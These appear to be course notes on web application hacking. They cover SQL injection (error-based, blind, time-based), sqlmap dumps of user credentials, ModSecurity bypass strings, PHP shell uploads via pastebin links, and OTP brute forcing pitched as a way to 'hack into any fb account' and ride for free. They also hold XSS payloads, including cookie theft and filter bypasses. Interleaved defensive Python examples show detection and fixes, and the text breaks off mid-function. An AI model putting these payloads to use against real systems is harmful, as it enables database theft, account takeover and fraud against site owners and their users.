- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Now we have to get the tables. We want the tables from the primary database.
- Here is the query for the tables of the primary database.
- Increase the value of LIMIT from LIMIT 0,1 to LIMIT 1,1, LIMIT 2,1, LIMIT 3,1 until you get your desired table name.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xADMIN limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Now we have to get the column names from the table. We got a table named admin, so let's get the columns from the table admin. Here is the query for getting the column names from the table admin.
- To get the columns from the table admin we have to encode its name in hex, and then we can execute our query.
- Here is that part of our query:
- table_name=admin
- Here is the hex value of admin = 61646d696e
- Put 0x in front of it to build our correct query.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Increase the value of LIMIT (LIMIT 0,1, LIMIT 1,1, LIMIT 2,1) until we get column names like username and password.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x3a,COLUMN_NAME_2) as char),0x3a)) from TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- After we get the column names like username and password, the next step is to extract data from these columns.
- We put TABLENAME=admin
- and
- COLUMN_NAME_1=username
- COLUMN_NAME_2=password
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password) as char),0x3a)) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- STACKED QUERY SQL INJECTION
- ============================
- Stacked query SQL injection is the one which executes by terminating the original query and adding a new one; with it, it becomes possible to modify data and call stored procedures, i.e. create, delete and modify the database and its entities. This technique is massively used in SQL injection attacks, and understanding its principle is essential to a sound understanding of this security issue.
- This can be done with SQL injection automation tools like "SQLMAP" etc.
- SQLMAP --> Python based command line tool for automating SQL injection
- http://sqlmap.org/
- Python 2.7 --> https://www.python.org/download/releases/2.7/
- HAVIJ --> Illegal tool, GUI based
- SQLMAP
- ======
- 1.
- sqlmap.py
- 2. To test whether the website is up or not, and whether it is vulnerable or not
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1
- 3. To get the database ----> --dbs
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 --dbs
- available databases [2]:
- [*] acuart
- [*] information_schema
- 4. To get the tables
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart --tables
- Database: acuart
- [8 tables]
- +-----------+
- | artists |
- | carts |
- | categ |
- | featured |
- | guestbook |
- | pictures |
- | products |
- | users |
- +-----------+
- 5. To get the columns
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart -T users --columns
- Database: acuart
- Table: users
- [8 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | address | mediumtext |
- | cart | varchar(100) |
- | cc | varchar(100) |
- | email | varchar(100) |
- | name | varchar(100) |
- | pass | varchar(100) |
- | phone | varchar(100) |
- | uname | varchar(100) |
- +---------+--------------+
- 6. To dump the data from the columns
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart -T users -C name,uname,pass --dump
- Database: acuart
- Table: users
- [1 entry]
- +------------+-------+------+
- | name | uname | pass |
- +------------+-------+------+
- | John Smith | test | test |
- +------------+-------+------+
- HAVIJ
- =====
- GUI Based tool
- Google Dorks
- ============
- Advance Google Searching Techniques
- -----------------------------------
- Google Hacking Database.
- Arijit Singh
- Whenever we search anything on Google, the Google search engine shows us the data in 3 different colours.
- Blue --> Headings --> Titles
- Green -> Links and urls
- Black -> Content
- intitle: inception
- inurl: inception
- intext: inception
- title--> movie
- url --> inception
- intitle:movie and inurl:inception
- indexof:/inception
- hacking filetype:pdf
- SQL Injection Vulnerable Web Sites
- ----------------------------------
- inurl:php?id=
- inurl:/view/viewer_index.shtml
- Session 12
- ==========
- Introduction to Firewall
- ------------------------
- Firewall
- --------
- It is an extra security layer which helps in securing our web application and web site. It acts as a middle layer in the data transmission between the user and the server.
- A firewall acts as a filter: it filters unwanted packets and malicious packets. A firewall works on the basis of signatures and the permutations and combinations of queries transmitted by the user. Knowledgebase --> it acts just like a database of signatures and combinations.
- There are two types of firewall:
- 1. Software Solution Firewall
- 2. Hardware Solution Firewall
- Software Solution Firewall
- --------------------------
- These are software packages which are installed on the server.
- Microsoft windows Firewall
- Hardware Solution Firewall
- --------------------------
- They are hardware devices which act as the man in the middle and filter the packets which are malicious.
- MOD Security
- WAF --> Web Application Firewall
- --------------------------------
- MOD Security
- ------------
- Installation of Mod Security
- ============================
- Installing and configuring ModSecurity
- Step 1: open terminal and type
- $ apt-get update
- $ apt-get upgrade
- $ apt-get install apache2
- Step 2: $ sudo apt-get install libapache2-modsecurity
- Step 3: Now we need to place a modsecurity.conf configuration file into /etc/modsecurity
- $ sudo cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
- now open
- $ sudo nano /etc/modsecurity/modsecurity.conf
- Find this line:
- SecRuleEngine DetectionOnly
- and change it to:
- SecRuleEngine On
- Step 4: now check the apache2 log directory:
- $ ls /var/log/apache2
- You should see three files: access.log, error.log and other_vhosts_access.log.
- Now restart the apache2 service and check this directory again
- $ sudo service apache2 reload
- $ ls /var/log/apache2
- A new log called modsec_audit.log was created
- Step 5: now check the modsecurity-crs directory
- $ ls /usr/share/modsecurity-crs/
- You should see the directories: activated_rules, base_rules, experimental_rules and optional_rules
- Step 6: to activate all of the rules in the base_rules and optional_rules directories, execute the following commands in a terminal:
- $ cd /usr/share/modsecurity-crs/base_rules
- $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/base_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done
- $ cd ..
- $ cd optional_rules
- $ cd /usr/share/modsecurity-crs/optional_rules
- $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/optional_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done
- $ cd ..
- $ cd experimental_rules
- $ cd /usr/share/modsecurity-crs/experimental_rules
- $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/experimental_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done
- Step 7: we need to tell apache where to find the activated rules. Open the /etc/apache2/mods-available/security2.conf file.
- $ sudo nano /etc/apache2/mods-available/security2.conf
- At the end of the file just before </IfModule> enter the following lines:
- Include "/usr/share/modsecurity-crs/*.conf"
- Include "/usr/share/modsecurity-crs/activated_rules/*.conf"
- save it
- Step 8: We must enable the headers module; this allows ModSecurity to control and modify the HTTP headers for both requests and responses.
- $ sudo a2enmod headers
- Now restart apache:
- $ sudo service apache2 restart
- cd /etc/apache2/sites-available
- ls ---> 000-default.conf
- sudo nano 000-default.conf
- edit
- ProxyPass --> Web application IP
- ProxyPassReverse --> Web application IP
- save and exit
- sudo service apache2 restart
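- A quick check of the end state of Steps 3 and 7, as an added example that is not part of the original notes: it parses the text of modsecurity.conf and security2.conf (the contents below are constructed samples shaped like the real files) and reports when the engine is still in DetectionOnly or the CRS Include lines are missing.

```python
"""Sanity-check the ModSecurity settings produced by Steps 3 and 7 above.

Added example (not from the original notes): the two configuration texts
below are constructed samples; check_modsecurity() is what you would run
against the real files after the install.
"""

# Constructed sample: modsecurity.conf copied from the -recommended file but
# never switched out of DetectionOnly (the state before the Step 3 edit).
MODSEC_CONF_BEFORE = """
# -- Rule engine initialization ---------------------------------------------
SecRuleEngine DetectionOnly
SecRequestBodyAccess On
SecAuditEngine RelevantOnly
SecAuditLog /var/log/apache2/modsec_audit.log
"""

# The same file after the Step 3 edit.
MODSEC_CONF_AFTER = MODSEC_CONF_BEFORE.replace("SecRuleEngine DetectionOnly",
                                               "SecRuleEngine On")

# Constructed sample of security2.conf with the two Include lines from Step 7.
SECURITY2_CONF = """
<IfModule security2_module>
    SecDataDir /var/cache/modsecurity
    IncludeOptional /etc/modsecurity/*.conf
    Include "/usr/share/modsecurity-crs/*.conf"
    Include "/usr/share/modsecurity-crs/activated_rules/*.conf"
</IfModule>
"""

REQUIRED_INCLUDES = (
    "/usr/share/modsecurity-crs/*.conf",
    "/usr/share/modsecurity-crs/activated_rules/*.conf",
)


def parse_directives(text):
    """Return (directive, value) pairs in file order.

    Apache syntax: one directive per line, '#' starts a comment, values may
    be quoted. Container tags such as <IfModule ...> are skipped.
    """
    directives = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("<") and line.endswith(">"):
            continue
        parts = line.split(None, 1)
        value = parts[1].strip().strip('"') if len(parts) > 1 else ""
        directives.append((parts[0], value))
    return directives


def check_modsecurity(modsec_conf, security2_conf):
    """Return a list of findings; an empty list means the notes' end state is reached."""
    findings = []
    # dict() keeps the last occurrence, which is also what Apache applies.
    modsec = dict(parse_directives(modsec_conf))

    engine = modsec.get("SecRuleEngine", "<missing>")
    if engine != "On":
        findings.append("SecRuleEngine is %s, not On: rules are logged but never block"
                        % engine)
    # SecAuditEngine defaults to Off, in which case modsec_audit.log never appears.
    if modsec.get("SecAuditEngine", "Off") == "Off":
        findings.append("SecAuditEngine is Off: modsec_audit.log will not be written")

    includes = [value for name, value in parse_directives(security2_conf)
                if name.lower() == "include"]
    for path in REQUIRED_INCLUDES:
        if path not in includes:
            findings.append("security2.conf does not Include %s: CRS rules are not loaded"
                            % path)
    return findings


if __name__ == "__main__":
    for label, conf in (("before", MODSEC_CONF_BEFORE), ("after", MODSEC_CONF_AFTER)):
        print(label, check_modsecurity(conf, SECURITY2_CONF) or ["ok"])
```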
- Bypassing MOD_SECURITY
- ======================
- union select 1,2--+
- Block
- Mix Cases
- UnIoN SeLeCt 1,2--+
- Inline Executable Comments
- /*!......*/
- /*!UnIoN*/ /*!SeLeCt*/ 1,2--+
- /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+
- /*!UnIoN*/ /*!SeLeCt*/ 1,table_name from /*information_schema.tables*/--+
- http://www.slightergolf.com
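- Why these bypasses work and what a detection rule has to do about it, as an added example that is not part of the original notes: the payload strings are copies of the forms listed above, used as test input; normalize_mysql() resolves comments and case the way the MySQL parser does before the rule is matched.

```python
"""Normalise a query fragment the way MySQL will read it before matching on it.

Added example (not from the original notes): the bypasses listed above work
because a rule that matches the literal string 'union select' is compared
against the raw request, while MySQL strips comments and ignores case. A
detection rule has to normalise first; normalize_mysql() shows that step.
"""
import re

# Copies of the payload forms from the notes, used here as test input.
SAMPLES = [
    "union select 1,2--+",
    "UnIoN SeLeCt 1,2--+",
    "/*!UnIoN*/ /*!SeLeCt*/ 1,2--+",
    "/*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+",
    "/*!UnIoN*/ /*!SeLeCt*/ 1,table_name from /*information_schema.tables*/--+",
]

# /*! ... */ and /*!50000 ... */ are "versioned" comments: MySQL executes their body.
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,6}(.*?)\*/", re.S)
# Ordinary /* ... */ comments are dropped by the parser.
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b")


def normalize_mysql(fragment):
    """Return the fragment as MySQL's parser sees it: comments resolved, one case, one space."""
    text = VERSIONED_COMMENT.sub(r" \1 ", fragment)   # keep the executed body
    text = PLAIN_COMMENT.sub(" ", text)               # drop ignored text
    text = text.replace("+", " ")                     # the '+' the notes use for a URL-encoded space
    return re.sub(r"\s+", " ", text).strip().lower()


def naive_match(fragment):
    """The literal, case-sensitive check that only catches the first sample."""
    return "union select" in fragment


def normalized_match(fragment):
    """Match on the normalised form: all five samples hit this."""
    return UNION_SELECT.search(normalize_mysql(fragment)) is not None


if __name__ == "__main__":
    for sample in SAMPLES:
        print("%-75s naive=%-5s normalized=%s"
              % (sample, naive_match(sample), normalized_match(sample)))
```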
- BLIND SQL INJECTION
- ===================
- Blind SQL injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application's response. This attack is often used when the web application is configured to show a generic error message but has not mitigated the code that is vulnerable to SQLi. This type of SQL injection is identical to normal SQL injection; the only difference is the way the data is retrieved from the database.
- 1. Blind Boolean
- 2. Time Based SQL Injection
- http://newsletter.com/items.php?id=2
- ------------------------------------
- select title,description from items where id=2
- ----------------------------------------------
- http://newsletter.com/items.php?id=2 and 1=2
- select title,description from items where id=2 and 1=2
- Demo
- ====
- 1
- 1'
- 1' and 1=0 # ---> False --> Did not give me data
- 1' and 1=1 # ---> True --> It gave me data
- 1' and 1=0 order by 1 # --> No Result ---> Generic error
- 1' and 1=1 order by 1 # --> Result --> normal result
- 1' and 1=0 order by 2 # --> No result
- 1' and 1=1 order by 2 # ---> Result
- 1' and 1=0 order by 3 # ---> No Result
- 1' and 1=1 order by 3 # ---> No Result ---> True ---> there are 2 number of columns
- 1' and 1=0 union select 1,2 #
- ID: 1' and 1=0 union select 1,2 #
- First name: 1
- Surname: 2
- 1' and 1=1 union select 1,2 #
- ID: 1' and 1=1 union select 1,2 #
- First name: admin
- Surname: admin
- ID: 1' and 1=1 union select 1,2 #
- First name: 1
- Surname: 2
- 1' and 1=0 union select NULL,2 # --> No data
- 1' and 1=1 union select null,2 #---> Shows Data
- ID: 1' and 1=1 union select null,2 #
- First name: admin
- Surname: admin
- ID: 1' and 1=1 union select null,2 #
- First name:
- Surname: 2
- 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,1,1)=4 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,1,1)=3 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,1,1)=2 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,1,1)=1 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=1 #
- First name:
- Surname: 1
- 1' and 1=0 union select null,substr(@@version,2,1)=1 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,2,1)=2 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,2,1)=3 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,2,1)=0 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 1
- 1' and 1=0 union select null, table_name from information_schema.tables #
- 1' and 1=0 union select null, table_name from information_schema.tables where table_schema != 'information_schema' and table_schema != 'mysql' #
- 10.1.25-MariaDB
- substr(@@version,1,1) ----> 1
- x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 13
- ==========
- Time Based SQL Injection
- ========================
- This type of SQL injection relies on the database pausing for a specific amount of time when returning the results, indicating successful SQL query execution.
- sleep()
- delay()
- hibernate()
- Basic syntax
- select if(expression,true,false)
- This type of SQL injection is a sub-type of Blind SQL Injection. This is considered to be our last resort.
- sleep(3) --> make the database sleep for 3 seconds and then give me the result.
- DEMO
- ====
- 1 --> result
- 1' --> no result
- Instantly reloading the page
- 1' - sleep(3) #
- ID: 1' - sleep(3) #
- First name: admin
- Surname: admin
- 1' - if(mid(version(),1,1)='5', sleep(3),0) #
- ID: 1' - if(mid(version(),1,1)='5', sleep(3),0) #
- First name: admin
- Surname: admin
- This query will load the response Instantly.
- 1' - if(mid(version(),1,1)='4', sleep(3),0) #
- ID: 1' - if(mid(version(),1,1)='5', sleep(3),0) #
- First name: admin
- Surname: admin
- This query will load the response Instantly.
- 1' - if(mid(version(),1,1)='3', sleep(3),0) #
- ID: 1' - if(mid(version(),1,1)='5', sleep(3),0) #
- First name: admin
- Surname: admin
- This query will load the response Instantly.
- 1' - if(mid(version(),1,1)='2', sleep(3),0) #
- ID: 1' - if(mid(version(),1,1)='5', sleep(3),0) #
- First name: admin
- Surname: admin
- This query will load the response Instantly.
- 1' - if(mid(version(),1,1)='1', sleep(3),0) #
- ID: 1' - if(mid(version(),1,1)='1', sleep(3),0) #
- First name: admin
- Surname: admin
- This query will load the response after a delay of 3 seconds.
- which means, that the first character of version is '1'
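- The items.php lookup from the Blind SQL Injection section (Session 12), vulnerable and fixed, as an added example that is not part of the original notes; it serves the time-based demo above as well, since the fix is the same. The SQLite table and its rows are constructed stand-ins for the newsletter items table.

```python
"""The items.php lookup from the Blind SQL Injection notes, vulnerable and fixed.

Added example (not from the original notes): a constructed SQLite stand-in
for the newsletter 'items' table. lookup_vulnerable() pastes the id into the
query text, which is why 'id=2 and 1=2' changes the response and a
true/false (or sleep-based) probe can be answered one bit at a time.
lookup_hardened() validates the type and binds the value, so the same
inputs are never parsed as SQL.
"""
import sqlite3


def make_db():
    """Constructed sample data; the real items table is not part of the notes."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT, description TEXT)")
    con.executemany("INSERT INTO items VALUES (?, ?, ?)", [
        (1, "First item", "constructed"),
        (2, "Second item", "constructed"),
        (3, "Third item", "constructed"),
    ])
    return con


def lookup_vulnerable(con, raw_id):
    """items.php as described: select title,description from items where id=<raw input>."""
    return con.execute("select title,description from items where id=%s" % raw_id).fetchall()


def lookup_hardened(con, raw_id):
    """Type-check, then bind: the driver sends the value separately from the SQL text."""
    try:
        item_id = int(raw_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer, got %r" % (raw_id,)) from None
    return con.execute("select title,description from items where id=?", (item_id,)).fetchall()


def answers_true(con, lookup, raw_id, condition):
    """The inference step from the notes: does 'id=<raw_id> and <condition>' still return rows?"""
    return bool(lookup(con, "%s and %s" % (raw_id, condition)))


if __name__ == "__main__":
    con = make_db()
    print(lookup_vulnerable(con, "2 and 1=2"))      # []: the appended condition was executed
    print(answers_true(con, lookup_vulnerable, "2", "substr(sqlite_version(),1,1)='3'"))
    try:
        lookup_hardened(con, "2 and 1=2")
    except ValueError as exc:
        print("hardened:", exc)                      # the probe is rejected as data
```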
- POST PARAMETER INJECTION
- ========================
- We will tamper with the data using a third-party application.
- Burp Suite
- Tamper Data
- Arbitrary File Upload
- =====================
- When the web application asks you to input or upload some kind of document, the person instead uploads some kind of malicious file, like darkComet.exe or b374k.php.
- b374k.php ---> PHP Shell --> PHP Trojan
- Connection from DarkComet ---> connection via PHP code, remote access of the server.
- https://pastebin.com/raw/KpNsxj0c
- https://pastebin.com/raw/ATJE7VdZ
- Tools To Automate VAPT
- ======================
- Acunetix --> https://www.acunetix.com/vulnerability-scanner/wvs-demo-requested/
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 14
- ==========
- Introduction To Burp Suite
- --------------------------
- Brute Forcing
- Anand Prakash
- =============
- Hack Into any fb account
- twitter account
- OLA and Uber rides for free
- Food For Free
- www.facebook.com ---> wrong credentials ---> Forget Password --> OTP
- 4 digits ---> 0000-9999 ---> 10,000 different numbers
- 5 min
- 5 wrong OTPs ---> block
- m.facebook.com ---> forget password ---> OTP
- Brute Forcing
- Unlimited try
- Burp Suite Download Link
- https://portswigger.net/burp/communitydownload
- I will open the Brute Force page of DVWA
- Browser setting ---> proxy settings
- 1. In the browser ---> go to settings ---> Options
- 2. Goto Proxy ---> settings
- 3. Tick Manual Proxy Configuration - Radio Button
- 4. I will enter the IP Address and the port number
- IP Address --> 127.0.0.1
- Port NUmber --> 8080
- 5. Tick --> Use proxy for all protocols
- 6. No Proxy For ---> localhost, 127.0.0.1 ---> Delete It ---> click on ok
- 7. I will start Burp Suite
- ========================================================================
- 8. Enter the credentials in the web page --> click on login
- 9. Burp will glow ---> data in the burp has been intercepted
- In Burp ---> I can see the data input by the user.
- 10. I will select all the data ----> right click ---> send to intruder
- 11. Goto Intruder Tab ---> Position Tab
- 12. Select all the data ---> clear all the markups ---> click on the Clear button
- 13. Select the user name and add the markup ---> by clicking ADD button
- 14. Select the Password and add the markup ---> by clicking ADD button
- Right Pane
- 15. I will select the attacking type ---> By Default it is sniper, But i will change it to Cluster Bomb
- 16. Navigate to the payload tab
- 17. Add user name in the payload number 1
- 18. Add password name in the payload number 2
- 19. Navigate to the options tab
- 20. grep match <-- Search this box
- 21. Clear all the content inside grep match
- 22. Paste the successful message in that box
- Welcome to the password protected area admin
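- The server-side control that the Anand Prakash story above turns on, as an added example that is not part of the original notes: an in-memory OTP verifier that counts failures per account, no matter which client (www or m.) sends the attempt, so a 4-digit code gets at most 5 guesses out of 10,000 instead of unlimited tries. The account names and the test-only code override are constructed.

```python
"""OTP verification with the lock-out the notes describe (5 wrong OTPs ---> block).

Added example (not from the original notes): a constructed in-memory
verifier. The weakness in the story above was that one entry point did not
count failures, so a 4-digit code could be tried 10,000 times. Counting per
account, on the server, caps a blind guess at 5 chances in 10,000.
"""
import hmac
import secrets
import time

OTP_DIGITS = 4          # 0000-9999: 10,000 possible codes
MAX_ATTEMPTS = 5        # failures allowed before the code is locked
OTP_TTL_SECONDS = 300   # the 5 minute validity window from the notes


class OtpVerifier:
    def __init__(self, clock=time.time):
        self._clock = clock           # injectable so the expiry path can be tested
        self._pending = {}            # account -> [otp, issued_at, failures]

    def issue(self, account, code=None):
        """Create a fresh code; 'code' overrides the random value for tests only."""
        if code is None:
            code = "%0*d" % (OTP_DIGITS, secrets.randbelow(10 ** OTP_DIGITS))
        self._pending[account] = [code, self._clock(), 0]
        return code   # delivered out of band (SMS) in a real system, never to the web client

    def verify(self, account, submitted):
        """Return one of: ok, wrong, locked, expired, no_otp."""
        entry = self._pending.get(account)
        if entry is None:
            return "no_otp"
        otp, issued_at, failures = entry
        if self._clock() - issued_at > OTP_TTL_SECONDS:
            del self._pending[account]
            return "expired"
        if failures >= MAX_ATTEMPTS:
            return "locked"             # even the right code is refused now
        if hmac.compare_digest(otp, str(submitted)):
            del self._pending[account]  # one-time: a used code cannot be replayed
            return "ok"
        entry[2] = failures + 1
        return "locked" if entry[2] >= MAX_ATTEMPTS else "wrong"


def simulate_brute_force(verifier, account):
    """Feed every code in order, as the Intruder run above would; return (attempts_taken, outcome)."""
    attempts = 0
    for guess in range(10 ** OTP_DIGITS):
        result = verifier.verify(account, "%0*d" % (OTP_DIGITS, guess))
        if result == "locked":
            return attempts, "locked"
        attempts += 1
        if result == "ok":
            return attempts, "ok"
    return attempts, "exhausted"


if __name__ == "__main__":
    v = OtpVerifier()
    v.issue("demo-account")
    print(simulate_brute_force(v, "demo-account"))   # (4, 'locked') unless the code is below 0005
```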
- Command Execution Vulnerability
- ===============================
- In many web applications there are parameters which ask for a certain type of value. Instead of providing them the exact value, we make them execute certain terminal commands.
- CMD
- Linux --> Bash
- | --> pipe function ---> output of first command will be the input of second command
- File Inclusion Vulnerability
- ============================
- 1. Local File Inclusion Vulnerability
- ../../
- ../
- 2. Remote File Inclusion Vulnerability
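- Input handling for the two bug classes above, as an added example that is not part of the original notes: ping_command() stands in for a "ping this host" parameter (command execution) and safe_include_path() for a "page=" parameter (local file inclusion); both function names and the base directory are constructed for the example.

```python
"""Input handling for OS command execution and file inclusion parameters.

Added example (not from the original notes). ping_command() stands in for a
"ping this host" parameter and safe_include_path() for a "page=" include
parameter; both names are constructed for this example.
"""
import ipaddress
import os
import re
import subprocess

# RFC 1123 host name: labels of letters, digits and '-', no leading/trailing '-'.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def ping_command(target):
    """Return the argv for pinging a user-supplied host, or raise ValueError.

    Two independent layers: the allowlist rejects '|', ';', '&&' and friends
    because they cannot appear in a host name or IP literal, and the result
    is an argv list for subprocess with shell=False, so a pipe character would
    reach ping as an argument, never as a shell operator.
    """
    target = target.strip()
    try:
        ipaddress.ip_address(target)
    except ValueError:
        if not HOSTNAME_RE.match(target):
            raise ValueError("not a host name or IP address: %r" % target) from None
    return ["ping", "-c", "1", target]


def run_ping(target):
    """Execute the validated command; note the list form and shell=False."""
    return subprocess.run(ping_command(target), shell=False,
                          capture_output=True, text=True, timeout=10)


def safe_include_path(base_dir, requested):
    """Resolve a page name under base_dir and refuse anything that ends up outside it.

    realpath() collapses every '../' and follows symlinks, so the decision is
    taken on the final location, not on the string the user sent (a string
    match on '../' alone misses encoded variants and symlinks).
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes %s: %r" % (base_dir, requested))
    return candidate


if __name__ == "__main__":
    print(ping_command("127.0.0.1"))
    print(safe_include_path("/var/www/html", "welcome.php"))
    for bad in ("127.0.0.1 | id", "../../etc/passwd"):
        try:
            ping_command(bad) if "|" in bad else safe_include_path("/var/www/html", bad)
        except ValueError as exc:
            print("rejected:", exc)
```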
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 15
- ==========
- Introduction to java script
- ===========================
- Java --> Programming language ---> Used for making applications and software
- JavaScript --> It is a scripting language, which helps in running some kind of script on web applications.
- <script>
- ......
- ......
- ......
- ......
- </script>
- <html>
- <head>
- <title>Java Script</title>
- </head>
- <body>
- <script>
- alert("Hacked By Rishi Raj and Team");
- </script>
- </body>
- </html>
- 2 Number Addition
- =================
- <html>
- <head>
- <title>Java Script</title>
- </head>
- <body>
- <h1>Calculator</h1>
- <form>
- First Number :<input type="text" id="one"><br>
- Second Number:<input type="text" id="two"><br>
- <button onclick="addition()">Add</button>
- </form>
- </body>
- <script>
- function addition()
- {
- var onee = document.getElementById("one").value;
- var twoo = document.getElementById("two").value;
- var sum= +onee + +twoo;
- alert(sum);
- document.write(sum);
- }
- </script>
- </html>
- XSS --> Cross Site Scripting
- ============================
- In which the web application or the web site executes HTML tags given as normal input and displays the data rendered with those HTML tags.
- In this type of attack the attacker can make the target do whatever he wants. An attacker can craft a link and send it to the target; when the target opens the crafted link, the malicious work of the attacker is carried out.
- There are three types of XSS
- ----------------------------
- 1. Reflected XSS
- 2. Stored XSS
- 3. DOM Based XSS
- 1. Reflected XSS
- ================
- In this type of XSS, the attacker can attack a person one time using the crafted link. The attacker can inject into the web application just once; then the malicious query goes away.
- <h1>abhijeet</h1>
- <script>alert("hacked")</script>
- <script>alert(document.cookie)</script>
- <iframe src="http://www.lucideus.com"></iframe>
- <script>alert("hacked")</script>
- <>alert("hacked")</script>
- Bypass
- ======
- <script> ---> remove
- <script type="text/javascript">alert("hacked")</script>
- <ScRiPt>alert("hacked")</script>
- <scr<script>ipt>alert("hacked")</script>
- <scr<script>ipt>
- <script>
- 2. Stored XSS
- =============
- An attacker inputs malicious JavaScript code into the entry point, and that malicious code is stored in the database. So whenever a user goes to that page of the web application, he will be a target of XSS. This malicious code will remain in the database until the database administrator removes it manually or resets the database.
- Where We can try for stored XSS
- ===============================
- 1. Comments
- 2. Messages
- 3. FAQ
- 4. Form
- 5. RSS Feedback
- 3. DOM Based XSS
- ================
- Document Object Model
- In this type of XSS, our data is not sent to the server, but the page is updated dynamically.
- There are 3 entities which are vulnerable in DOM Based XSS
- 1. document.URL
- 2. document.location
- 3. document.referrer
- DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.
- https://lucideustech.blogspot.com/2018/03/a-practical-guide-to-dom-based-xss.html
- XSS Payloads
- ============
- <h1>abhijeet</h1>
- <script>alert("hacked")</script>
- <script>alert(document.cookie)</script>
- <iframe src="http://www.lucideus.com"></iframe>
- <input onfocus=javascript:alert(1) autofocus>
- Cheat Sheet
- ===========
- https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45
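- Why the "remove <script>" filter from the Bypass section fails and what output encoding does instead, as an added example that is not part of the original notes: the payload strings are copies of the ones listed above, used as test input; the reflection point and its greeting text are constructed.

```python
"""Why 'remove <script>' fails and what output encoding does instead.

Added example (not from the original notes): the payload strings are copies
of the ones listed above. naive_filter() is the kind of blacklist the Bypass
section defeats; escape_for_html() is the fix for the HTML-text and
attribute-value contexts (URL and JavaScript contexts need their own encoders).
"""
import html
import re

PAYLOADS = [
    '<h1>abhijeet</h1>',
    '<script>alert("hacked")</script>',
    '<script type="text/javascript">alert("hacked")</script>',
    '<ScRiPt>alert("hacked")</script>',
    '<scr<script>ipt>alert("hacked")</script>',
    '<input onfocus=javascript:alert(1) autofocus>',
]

# Anything the HTML parser would start a tag on: '<', optional '/', then a letter.
TAG_START = re.compile(r"<\s*/?\s*[A-Za-z]")


def naive_filter(user_input):
    """Delete the literal '<script>' once, as the filter in the Bypass section does."""
    return user_input.replace("<script>", "")


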